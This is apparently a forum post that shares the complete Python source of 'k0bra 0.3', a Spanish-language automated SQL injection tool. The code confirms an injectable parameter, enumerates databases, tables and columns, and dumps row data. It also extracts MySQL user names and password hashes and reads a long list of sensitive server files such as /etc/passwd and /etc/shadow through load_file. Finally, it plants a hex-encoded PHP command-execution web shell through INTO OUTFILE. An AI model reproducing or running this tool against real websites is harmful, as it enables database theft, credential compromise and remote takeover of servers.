Un completo scanner SQLI hecho en python

Las funciones son las siguientes

[+] Comprobar vulnerabilidad
[+] Buscar numero de columnas
[+] Buscar automaticamente el numero para mostrar datos
[+] Mostras tablas
[+] Mostrar columnas
[+] Mostrar bases de datos
[+] Mostrar tablas de otra DB
[+] Mostrar columnas de una tabla de otra DB
[+] Mostrar usuarios de mysql.user
[+] Buscar archivos usando load_file
[+] Mostrar un archivo usando load_file
[+] Mostrar valores
[+] Mostrar informacion sobre la DB
[+] Crear una shell usando outfile
[+] Todo se guarda en logs ordenados
[+] Manejo de control+c
#!usr/bin/python
#k0bra 0.3 (C) Doddy Hackman 2011

import os,sys,urllib2,re,binascii
from urlparse import urlparse

files = ["/etc/passwd","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/admin.php","C:/xampp/htdocs/leer.txt","../../../boot.ini","../../../../boot.ini","../../../../../boot.ini","../../../../../../boot.ini","/etc/shadow","/etc/shadow~","/etc/hosts","/etc/motd","/etc/apache/apache.conf","/etc/fstab","/etc/apache2/apache2.conf","/etc/apache/httpd.conf","/etc/httpd/conf/httpd.conf","/etc/apache2/httpd.conf","/etc/apache2/sites-available/default","/etc/mysql/my.cnf","/etc/my.cnf","/etc/sysconfig/network-scripts/ifcfg-eth0","/etc/redhat-release","/etc/httpd/conf.d/php.conf","/etc/pam.d/proftpd","/etc/phpmyadmin/config.inc.php","/var/www/config.php","/etc/httpd/logs/error_log","/etc/httpd/logs/error.log","/etc/httpd/logs/access_log","/etc/httpd/logs/access.log","/var/log/apache/error_log","/var/log/apache/error.log","/var/log/apache/access_log","/var/log/apache/access.log","/var/log/apache2/error_log","/var/log/apache2/error.log","/var/log/apache2/access_log","/var/log/apache2/access.log","/var/www/logs/error_log","/var/www/logs/error.log","/var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/etc/group","/etc/security/group","/etc/security/passwd","/etc/security/user","/etc/security/environ","/etc/security/limits","/usr/lib/security/mkuser.default","/apache/logs/access.log","/apache/logs/error.log","/etc/httpd/logs/acces_log","/etc/httpd/logs/acces.log","/var/log/httpd/access_log","/var/log/httpd/error_log","/apache2/logs/error.log","/apache2/logs/access.log","/logs/error.log","/logs/access.log","/usr/local/apache2/logs/access_log","/usr/local/apache2/logs/access.log","/usr/local/apache2/logs/error_log","/usr/local/apache2/logs/error.log","/var/log/httpd/access.log","/var/log/httpd/error.log","/opt/lampp/logs/access_log","/opt/lampp/logs/error_log","/opt/xampp/logs/access_log","/opt/xampp/logs/error_log","/opt/lampp/logs/access.log","/opt/lampp/logs/error.log","/opt/xampp/logs/access.log","/opt/xampp/logs/error.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\access.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\error.log","/usr/local/apache/conf/httpd.conf","/usr/local/apache2/conf/httpd.conf","/etc/apache/conf/httpd.conf","/usr/local/etc/apache/conf/httpd.conf","/usr/local/apache/httpd.conf","/usr/local/apache2/httpd.conf","/usr/local/httpd/conf/httpd.conf","/usr/local/etc/apache2/conf/httpd.conf","/usr/local/etc/httpd/conf/httpd.conf","/usr/apache2/conf/httpd.conf","/usr/apache/conf/httpd.conf","/usr/local/apps/apache2/conf/httpd.conf","/usr/local/apps/apache/conf/httpd.conf","/etc/apache2/conf/httpd.conf","/etc/http/conf/httpd.conf","/etc/httpd/httpd.conf","/etc/http/httpd.conf","/etc/httpd.conf","/opt/apache/conf/httpd.conf","/opt/apache2/conf/httpd.conf","/var/www/conf/httpd.conf","/private/etc/httpd/httpd.conf","/private/etc/httpd/httpd.conf.default","/Volumes/webBackup/opt/apache2/conf/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf.default","C:\\ProgramFiles\\ApacheGroup\\Apache\\conf\\httpd.conf","C:\\ProgramFiles\\ApacheGroup\\Apache2\\conf\\httpd.conf","C:\\ProgramFiles\\xampp\\apache\\conf\\httpd.conf","/usr/local/php/httpd.conf.php","/usr/local/php4/httpd.conf.php","/usr/local/php5/httpd.conf.php","/usr/local/php/httpd.conf","/usr/local/php4/httpd.conf","/usr/local/php5/httpd.conf","/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf","/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php","/usr/local/etc/apache/vhosts.conf","/etc/php.ini","/bin/php.ini","/etc/httpd/php.ini","/usr/lib/php.ini","/usr/lib/php/php.ini","/usr/local/etc/php.ini","/usr/local/lib/php.ini","/usr/local/php/lib/php.ini","/usr/local/php4/lib/php.ini","/usr/local/php5/lib/php.ini","/usr/local/apache/conf/php.ini","/etc/php4.4/fcgi/php.ini","/etc/php4/apache/php.ini","/etc/php4/apache2/php.ini","/etc/php5/apache/php.ini","/etc/php5/apache2/php.ini","/etc/php/php.ini","/etc/php/php4/php.ini","/etc/php/apache/php.ini","/etc/php/apache2/php.ini","/web/conf/php.ini","/usr/local/Zend/etc/php.ini","/opt/xampp/etc/php.ini","/var/local/www/conf/php.ini","/etc/php/cgi/php.ini","/etc/php4/cgi/php.ini","/etc/php5/cgi/php.ini","c:\\php5\\php.ini","c:\\php4\\php.ini","c:\\php\\php.ini","c:\\PHP\\php.ini","c:\\WINDOWS\\php.ini","c:\\WINNT\\php.ini","c:\\apache\\php\\php.ini","c:\\xampp\\apache\\bin\\php.ini","c:\\NetServer\\bin\\stable\\apache\\php.ini","c:\\home2\\bin\\stable\\apache\\php.ini","c:\\home\\bin\\stable\\apache\\php.ini","/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini","/usr/local/cpanel/logs","/usr/local/cpanel/logs/stats_log","/usr/local/cpanel/logs/access_log","/usr/local/cpanel/logs/error_log","/usr/local/cpanel/logs/license_log","/usr/local/cpanel/logs/login_log","/var/cpanel/cpanel.config","/var/log/mysql/mysql-bin.log","/var/log/mysql.log","/var/log/mysqlderror.log","/var/log/mysql/mysql.log","/var/log/mysql/mysql-slow.log","/var/mysql.log","/var/lib/mysql/my.cnf","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\data\\mysql-bin.log","C:\\MySQL\\data\\hostname.err","C:\\MySQL\\data\\mysql.log","C:\\MySQL\\data\\mysql.err","C:\\MySQL\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.ini","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.cnf","C:\\ProgramFiles\\MySQL\\my.ini","C:\\ProgramFiles\\MySQL\\my.cnf","C:\\MySQL\\my.ini","C:\\MySQL\\my.cnf","/etc/logrotate.d/proftpd","/www/logs/proftpd.system.log","/var/log/proftpd","/etc/proftp.conf","/etc/protpd/proftpd.conf","/etc/vhcs2/proftpd/proftpd.conf","/etc/proftpd/modules.conf","/var/log/vsftpd.log","/etc/vsftpd.chroot_list","/etc/logrotate.d/vsftpd.log","/etc/vsftpd/vsftpd.conf","/etc/vsftpd.conf","/etc/chrootUsers","/var/log/xferlog","/var/adm/log/xferlog","/etc/wu-ftpd/ftpaccess","/etc/wu-ftpd/ftphosts","/etc/wu-ftpd/ftpusers","/usr/sbin/pure-config.pl","/usr/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.conf","/usr/local/etc/pure-ftpd.conf","/usr/local/etc/pureftpd.pdb","/usr/local/pureftpd/etc/pureftpd.pdb","/usr/local/pureftpd/sbin/pure-config.pl","/usr/local/pureftpd/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.pdb","/etc/pureftpd.pdb","/etc/pureftpd.passwd","/etc/pure-ftpd/pureftpd.pdb","/var/log/pure-ftpd/pure-ftpd.log","/logs/pure-ftpd.log","/var/log/pureftpd.log","/var/log/ftp-proxy/ftp-proxy.log","/var/log/ftp-proxy","/var/log/ftplog","/etc/logrotate.d/ftp","/etc/ftpchroot","/etc/ftphosts","/var/log/exim_mainlog","/var/log/exim/mainlog","/var/log/maillog","/var/log/exim_paniclog","/var/log/exim/paniclog","/var/log/exim/rejectlog","/var/log/exim_rejectlog"]

def installer():
 try:
  os.mkdir("logs",0777)
 except:
  pass

def clean():
 if sys.platform=="win32":
  os.system("cls")
 else:
  os.system("clear")

def savefile(name,text):
 file = open(name,"a")
 file.write("\n"+text)
 file.close()

def gethost(test):
 return urlparse(test).netloc

def header() : 
 print ""
 print ""
 print " @      @@   @   "          
 print "@@     @  @ @@      "       
 print " @ @@  @  @  @ @   @ @ @@@ "
 print " @ @   @  @  @@ @ @@@ @  @ "
 print " @@    @  @  @  @  @   @@@ "
 print " @ @   @  @  @  @  @  @  @ "
 print "@@@ @   @@   @@@  @@@ @@@@@"
 print ""
 print ""

def copyright() : 
 print "\n\n(C) Doddy Hackman 2010\n"

def show() :
 print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()

def bypass(bypass): 
 if bypass == "--":
  return("+","--")
 elif bypass == "/*":
  return("/**/","/**/")
 else: 
  return("+","--")

def reiniciar():
 copyright()
 raw_input()
 sta()

def dumper(web,passx,table,col1,col2):
 
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
 code1 = toma(web1+pass1+"from"+pass1+table+pass2)
 print "\n\n[+] Searching values\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  savefile("logs/"+gethost(web)+".txt","")
  savefile("logs/"+gethost(web)+".txt","[+] Values Found in table "+table+" : "+numbers+"\n")
  print "[+] Values Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)	
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    c1 = re.findall("K0BRA(.*?)K0BRA",code2)
    c1 = c1[0]
    c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
    c2 = c2[0]
    print "["+col1+"] : "+c1
    print "["+col2+"] : "+c2+"\n"
    savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
    savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
 else:
  print "[-] Not Found\n"

def mysqluser(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 print "\n\n[+] Searching mysql.user\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] mysql.user : ON"
  savefile("logs/"+gethost(web)+".txt","")
  savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
  savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
  print "[+] Users Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    host = re.findall("K0BRA(.*?)K0BRA",code2)
    host = host[0]
    user = re.findall("K0BRA1(.*?)K0BRA1",code2)
    user = user[0]
    passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
    passw = passw[0]
    savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
    savefile("logs/"+gethost(web)+".txt","[User] : "+user)
    savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
    print "[Host] : "+host
    print "[User] : "+user
    print "[Pass] : "+passw+"\n"    
 else:
  print "[-] Not Found\n" 
 

def showcolumnsdb(web,db,table,passx):
 db2 = db 
 table2 = table
 db = "0x"+str(binascii.hexlify(db))
 table = "0x"+str(binascii.hexlify(table))
 pass1,pass2 = bypass(passx)
 savefile("logs/"+gethost(web)+".txt","")
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)	
 print "\n\n[+] Searching columns in DB\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    savefile("logs/"+gethost(web)+".txt","[Column Found in table "+table2+" in DB "+table2+"] : "+column)
    print "[Column Found] : "+column
 else:
  print "[-] Not Found\n"


def showtablesdb(web,db,passx):
 db2 = db
 db = "0x"+str(binascii.hexlify(db))
 pass1,pass2 = bypass(passx)
 savefile("logs/"+gethost(web)+".txt","")
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)	
 print "\n\n[+] Searching tables in DB\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found in DB "+db2+"] : "+table)
 else:
  print "[-] Not Found\n"

def showtables(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 print "\n\n[+] Searching tables\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  savefile("logs/"+gethost(web)+".txt","")
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Tables Found : ",numbers,"\n"	
  for counter in range(17,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    table = re.findall("K0BRA(.*?)K0BRA",code2)
    table = table[0]
    print "[Table Found] : "+table
    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
 else:
  print "[-] Not Found\n"

def showcolumns(tabla,web,passx):
 pass1,pass2 = bypass(passx)
 tabla2 = tabla
 tabla = "0x"+str(binascii.hexlify(tabla))
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
 print "\n\n[+] Searching columns\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  savefile("logs/"+gethost(web)+".txt","")
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] Columns Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    column = re.findall("K0BRA(.*?)K0BRA",code2)
    column = column[0]
    print "[Column Found in table "+tabla2+"] : "+column
    savefile("logs/"+gethost(web)+".txt","[Column Found in table "+tabla2+"] : "+column)
 else:
  print "[-] Not Found\n"


def showdbs(web,passx):
 pass1,pass2 = bypass(passx)
 web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
 code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
 print "\n\n[+] Searching DBS\n\n"
 if (re.findall("K0BRA(.*?)K0BRA",code1)):
  savefile("logs/"+gethost(web)+".txt","")
  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  numbers = numbers[0]
  print "[+] information_schema : ON"
  print "[+] DBS Found : ",numbers,"\n"	
  for counter in range(0,int(numbers)):
   code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
   if (re.findall("K0BRA(.*?)K0BRA",code2)):
    db = re.findall("K0BRA(.*?)K0BRA",code2)
    db = db[0]
    print "[DB Found] : "+db
    savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
 else:
  print "[-] Not Found\n"

def men():
 print "\n[+] Press any key to continue\n"
 raw_input()    
 menu(page,bypass)

def fuzz(web,bypassx):
 print "\n[+] Fuzzing files with load_file()\n"
 pass1,pass2 = bypass(bypassx)
 for archivos in files: 
  nombre = archivos
  file = "0x"+str(binascii.hexlify(archivos))
  web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)

  code = toma(web1)

  if (re.findall("k0bra(.*?)k0bra",code,re.S)):
   algo = re.findall("k0bra(.*?)k0bra",code,re.S)
   print "\n[File Found] : ",nombre
   print "\n[Source Start]\n"
   print algo[0]
   print "\n[Source End]"
   savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
   savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
   savefile("logs/"+gethost(web)+".txt",algo[0])
   savefile("logs/"+gethost(web)+".txt","\n[Source End]")
 print "\n[+] Finished\n"

def fuzzfile(web,bypassx):
 pass1,pass2 = bypass(bypassx)
 archivos = raw_input("\n[File To load] : ")
 nombre = archivos
 file = "0x"+str(binascii.hexlify(archivos))
 web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)

 code = toma(web1)

 if (re.findall("k0bra(.*?)k0bra",code,re.S)):
  algo = re.findall("k0bra(.*?)k0bra",code,re.S)
  print "\n\n[File Found] : ",nombre
  print "\n[Source Start]\n"
  print algo[0]
  print "\n[Source End]"
  savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
  savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
  savefile("logs/"+gethost(web)+".txt",algo[0])
  savefile("logs/"+gethost(web)+".txt","\n[Source End]")
 else:
  print "\n\n[-] Error"

def into(web,passx):
 pass1,pass2 = bypass(passx)
 dira = raw_input("\n\n[Full Source Discloure] : ")
 diro = raw_input("\n[Directory to test] : ")
 
 linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
 lugar = dira+"/cmd.php"
 lugardos = diro+"/cmd.php"
 webtest = "http://"+gethost(web)+lugardos
 web1 = re.sub("hackman",linea,web)
 formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
 toma(formandoweb)
 code = toma(webtest)
 if (re.findall("Mini Shell By Doddy",code)):
  print "\n\n[shell up] : "+webtest
  savefile("logs/"+gethost(web)+".txt","\n[shell up] : "+webtest)
 else:
  print "\n\n[-] Error"


def menu(page,bypass):
 clean()
 header()
 print "\n[+] Target : ",page,"\n"
 print "\n[information_schema]\n"
 print "1 - Show tables"
 print "2 - Show columns of the a table"
 print "3 - Show databases"
 print "4 - Show tables from the a DB"
 print "5 - Show columns from the a table of the DB"
 print "\n[mysql.user]\n"
 print "6 - Show users"
 print "\n[Others]\n"
 print "7 - Show details"
 print "8 - Dump data" 
 print "9 - Fuzz Files with load_file"
 print "10 - Load files with load_file"
 print "11 - Create Shell"
 print "12 - Show log"
 print "13 - Change target"
 print "14 - Exit\n\n"

 
 try:

  op = input("[Option] : ")

  if op == 1: 
   showtables(page,bypass)
   men()
  elif op == 2:
   table = raw_input("\n\n[Table] : ")
   showcolumns(table,page,bypass)
   men()
  elif op == 3:
   showdbs(page,bypass)
   men()
  elif op == 4:
   db = raw_input("\n\n[DB] : ")
   showtablesdb(page,db,bypass)
   men()
  elif op == 5:
   db = raw_input("\n\n[DB] : ")
   table = raw_input("\n\n[Table] : ")
   showcolumnsdb(page,db,table,bypass)
   men()
  elif op == 6:
   mysqluser(page,bypass)
   men()
  elif op == 7:
   more(page,bypass)
   men()	
  elif op == 8:

   table = raw_input("\n\n[Table] : ")
   col1 = raw_input("\n\n[Column 1] : ")
   col2 = raw_input("\n\n[Column 2] : ")
   dumper(page,bypass,table,col1,col2)
   men()
   
  elif op == 9:
   fuzz(page,bypass) 
   men()
  elif op == 10:
   fuzzfile(page,bypass)
   men()	
  elif op == 11:
   into(page,bypass)
   men()
  elif op == 12:
   os.system("start logs/"+gethost(page)+".txt")
   menu(page,bypass)
  elif op == 13:
   sta()
  elif op == 14:
   sys.exit(1)  
  else:
   menu(page,bypass)
 except:
  menu(page,bypass)

def more(web,passx):
 pass1,pass2 = bypass(passx)
 otraweb = web
 print "\n[+] Searching more data\n"
 hextest = "0x2f6574632f706173737764"
 web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
 web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
 code0 = toma(web1+pass2)
 if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  datar = re.split("K0BRA",datax[0])
  savefile("logs/"+gethost(web)+".txt","")
  print "[+] Username :",datar[1]
  print "[+] Database :",datar[2]
  print "[+] Version :",datar[3],"\n"
  savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
  savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
  savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
 code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
 if (re.findall("K0BRA",code1)):
   print "[+] mysql.user : on" 
   savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
 code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
 if (re.findall("K0BRA",code2)):
   print "[+] information_schema.tables : on"
   savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")
 codetres = toma(web2)
 if (re.findall("ERTOR854",codetres)):
  print "[+] load_file() : on"
  savefile("logs/"+gethost(web)+".txt","[+] load_file() : on")

def findlength(web,passx): 
 pass1,pass2 = bypass(passx) 
 print "\n[+] Finding columns length"
 number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
 for te in range(2,30):
  number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  if (re.findall("K0BRA(.*?)K0BRA",code)):
   numbers = re.findall("K0BRA(.*?)K0BRA",code)	
   print "[+] Column length :",te
   print "[+] Numbers",numbers,"print data"
   sql = ""
   tex = te + 1
   for sqlix in range(2,tex):
    sql = str(sql)+","+str(sqlix)
    sqli  = str(1)+sql
   sqla = re.sub(numbers[0],"hackman",sqli)
   savefile("logs/"+gethost(web)+".txt","\n[Target] : "+web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla+"\n")
   menu(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
 print "[-] Length dont found\n"
 reiniciar()
      
def scan(web,passx):
 pass1,pass2 = bypass(passx) 
 print "\n\n[+] Testing vulnerability"
 code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
 codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)

 if not code==codedos:
  print "[+] SQLI Detected"
  findlength(web,passx)
 else:
  print "[-] Not Vulnerable"
  op = raw_input("\n[+] Scan anyway y/n : ")
  if op == "y":
   findlength(web,passx)
  elif op == "n":
   reiniciar()
  else:
   reiniciar()

def sta(): 

 clean()
 header()
 
 web = raw_input("\n\n[Page] : ")
 bypasx = raw_input("\n\n[Bypass] : ")
 if (re.findall("hackman",web,re.I)):
  menu(web,bypasx)
 else:
  try:
   scan(web,bypasx)
  except:
   print "\n[-] Web offline"
   reiniciar()

installer()
sta()

#The End
Responder

Volver a “Fuentes”